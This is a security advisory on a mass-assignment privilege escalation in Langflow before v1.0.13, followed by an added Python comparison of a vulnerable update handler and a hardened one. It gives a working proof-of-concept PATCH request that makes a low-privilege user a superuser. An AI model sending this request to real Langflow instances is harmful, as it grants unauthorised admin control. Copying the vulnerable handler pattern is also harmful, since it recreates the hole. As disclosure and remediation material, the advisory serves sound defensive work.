Langflow Privilege Escalation through Mass Assignment
Langflow versions before v1.0.13 suffer from a Privilege Escalation vulnerability through Mass Assignment. By crafting a specific HTTP request to the users API endpoint, a remote and authenticated attacker with low privileges can obtain super admin privileges on the target Langflow instance.
Proof Of Concept:
In order to reproduce the issue, an attacker authenticated with low privileges on the application can send the following HTTP request:
PATCH /api/v1/users/[USER_ID] HTTP/1.1
Host: localhost
Authorization: Bearer [TOKEN]
Content-Length: 21

{
  "is_superuser":true
}
The user can then verify that their privileges have been updated by accessing https://localhost/api/v1/users/whoami.
Rémy Marot
Tue, 07/30/2024 – 11:13
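
The request above works because the update handler writes a privilege field taken straight from the request body. The following added example (not Langflow's code and not part of the original advisory) contrasts that mass-assignment pattern with a per-role field allowlist; the `User` model, the field names other than `is_superuser`, and the function names are assumptions made for illustration.

```python
from dataclasses import dataclass


# Hypothetical user model; only `is_superuser` is a field name from the advisory.
@dataclass
class User:
    id: str
    username: str
    is_active: bool = True
    is_superuser: bool = False


# Fields a user may change on their own account vs. fields reserved for admins.
SELF_SERVICE_FIELDS = {"username"}
ADMIN_ONLY_FIELDS = {"is_active", "is_superuser"}


class Forbidden(Exception):
    """Would map to an HTTP 403 response in a real handler."""


def update_user_vulnerable(target: User, body: dict) -> User:
    # Mass assignment: every key in the request body is copied onto the model,
    # so the caller decides which attributes get written.
    for key, value in body.items():
        if hasattr(target, key):
            setattr(target, key, value)
    return target


def update_user_hardened(caller: User, target: User, body: dict) -> User:
    # Object-level check: non-admins may only edit their own record.
    if caller.id != target.id and not caller.is_superuser:
        raise Forbidden("cannot modify another user")
    # The writable field set depends on the caller's role, not on the body.
    allowed = SELF_SERVICE_FIELDS | (ADMIN_ONLY_FIELDS if caller.is_superuser else set())
    # Reject instead of silently dropping, so the attempt shows up in logs.
    rejected = set(body) - allowed
    if rejected:
        raise Forbidden(f"fields not permitted: {sorted(rejected)}")
    for key, value in body.items():
        setattr(target, key, value)
    return target
```

Rejecting the whole request when it contains a non-permitted field, rather than ignoring that field, gives operators a clear signal to alert on.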